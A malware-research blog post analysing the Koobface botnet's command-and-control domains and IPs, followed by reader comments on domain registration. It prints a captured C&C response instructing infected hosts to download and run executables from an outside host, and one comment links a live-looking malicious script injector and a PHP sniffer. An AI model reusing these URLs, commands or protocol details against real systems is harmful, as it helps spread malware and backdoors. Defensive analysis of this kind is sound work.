In this second part of the series I will try to analyze the command and control structure/coordinates for another famous botnet, Koobface. This article is not a detailed analysis of the malware itself but covers mostly its botnet aspect. Readers who are interested to learn about the internals of this malware may refer these articles:
Koobface Leaves Victims the Black Spot
These articles were published back in December 2008 but most of the details are still valid for the newer versions.
Back to the CnC structure ... Koobface relies mostly on domain names to locate its CnC servers, instead of using hard coded IPs like Pushdo. As a matter of fact, I observed that it tends to change its CnC domains more often than the IPs behind those domains. Based on my lab data (for the last 3 months or so) I see Koobface connecting to 23 unique domains.
Here is the complete list:
a22092008.com
upr15may.com
a13092008.com
5824125537.com
a221008.com
y171108.com
a080908.net
main15052009.com
wn20090504.com
nua06032009.biz
lastshanse26032009.com
supersearch20090330.com
wnames1404.com
ram06032009.biz
fdns6mar09.info
nua20090515.com
websrv09.com
er21012009.com
open21012009.com
onames0603.com
586523333.com
x17012009.com
f071108.com
Surprisingly, when I count the collective IPs behind all these domains, I hardly find 4 unique IPs. Multiple domains have been resolving to these fixed IPs over the period I examined.
Sr.no |
ISP |
IP |
Country |
City |
|
1 |
TM NET SDN
BHD |
119.110.107.137 |
MALAYSIA |
KUALA LUMPUR |
|
2 |
CHINANET
JIANGSU PROVINCE NETWORK |
218.93.202.50 58.241.255.37 |
CHINA |
BEIJING |
|
3 |
MASTERFOREX
LTD |
92.38.0.69 |
CZECH
REPUBLIC |
|
Please note here that most of these domains are not resolving at the time of writing this article. Currently, the active domains and servers are as follows:
upr15may.com --> 92.38.0.69
wn20090504.com --> 119.110.107.137
websrv09.com --> 58.241.255.37
where upr15may.com (92.38.0.69) is the most active domain at the moment.
It looks like the only way to shutdown Koobface is to take down all of its domains. Pulling the plug of a particular server will be useless. Another thing worth noticing is that none of the servers above are hosted in the USA so what are our chances of shutting down these servers?
Now lets take a look at the BotnetWeb aspect in the case of Koobface. Is there any top layer malware involved in the the download of Koobface? Unfortunately the answer is yes. Apart from relying on social engineering and web exploits as propagation mechanisms, Koobface has been seen as the secondary download of many other known malware. This all forms a very powerful BotnetWeb, shutting the Koobface net itself might not be enough until the complete BotnetWeb is shut down.
Here is the list of known Koobface droppers.
Bredolab:
Piptea:
Meredrop:
Another important thing to consider here is that Kobface itself is a powerful downloader. Koobface asks for additional malware components as follows:
POST /ld/gen.php HTTP/1.1
Host: upr15may.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 108
f=0&a=1812198572&v=08&c=0&s=ld&l=8173&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1 200 OK
Date: Sat, 13 Jun 2009 07:04:14 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
a6
#PID=8173
START|http://www.osftp.yoyo.pl/1/6244.exe
STARTONCE|http://www.osftp.yoyo.pl/1/nfr.exe
WAIT|120
#BLACKLABEL
EXIT
0
In the above mentioned packet snippet, Koobface is trying to install 2 different malware samples onto the infected system. I did not get a chance to analyze these samples in detail but the initial black box investigation reveals:
1. 6244.exe installs a BHO. May be password stealing, not sure at the moment.
2. nfr.exe is a backdoor (TCP port 7171), probing on this port shows that there is some custom web server listening on this port.
Detailed analysis for these two components is due on my side, I'll try to cover them in some future article.
Conclusion:
1. We need to take down all the Koobface domains in order to shut it down. Shutting down the back end servers is not enough. The DNS records could easily be modified to point to new systems.
2. There is a percentage of Koobface instances which spread through other malware. These top level malware might drop another Koobface instance onto the infected machine pointing to different domains. Although pay per install always costs some money.
3. Lets not forget about child malware downloads. We need to kill them as well. The good thing is that for the last many months I am seeing same set of malware being downloaded by Koobface. It makes it easier to kill the command and control of these child malware as well. How? Watch for future articles.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
In the wild js-virus-injector, only use in sandbox!
hxxp://odyrt.net/
Site also used to scan others for php-bugs, a php-sniffer:
http://odyrt.net/info/templates/cmd.txt
Posted by: Surfer | 2009.07.03 at 01:08 AM
maybe not directly, but they are the group responsible for worldwide dns. they get to say who has accreditation or not. you can't register a domain without it. they should be reviewing all the domains that get registered, especially for reason(s) below.
one gripe i have is with the whois hiders, such as domainsbyproxy. these groups have to go away. it's bad enough that domains are registered to obviously fake locations and fake names, that we also have companies that intentionally put useless info into the whois records.
they're not the only types of people omitting proper data on the whois records, i just checked my .ca address and noticed that CIRA withholds everything except it's active/expiry statii.
if you saw that list of domains, would you register them? i wouldn't.
Posted by: joe blow | 2009.06.23 at 04:35 AM
joe,
The domains aren't fake, anymore than fireeye.com is fake. What they are is malicious, or used solely for malicious purposes. There is a process to shut these down, it takes time though, and effort.
I don't think ICANN is directly responsible here, though certainly they could enact some policy that allowed faster action against well known (how to show/prove that?) actors and domains.
Posted by: Chris | 2009.06.20 at 12:38 PM
i've been saying for years that there needs to be some serious reform over at icann... so many registrars should be losing their accreditation for blindly registering fake domains.
Posted by: joe blow | 2009.06.17 at 03:09 PM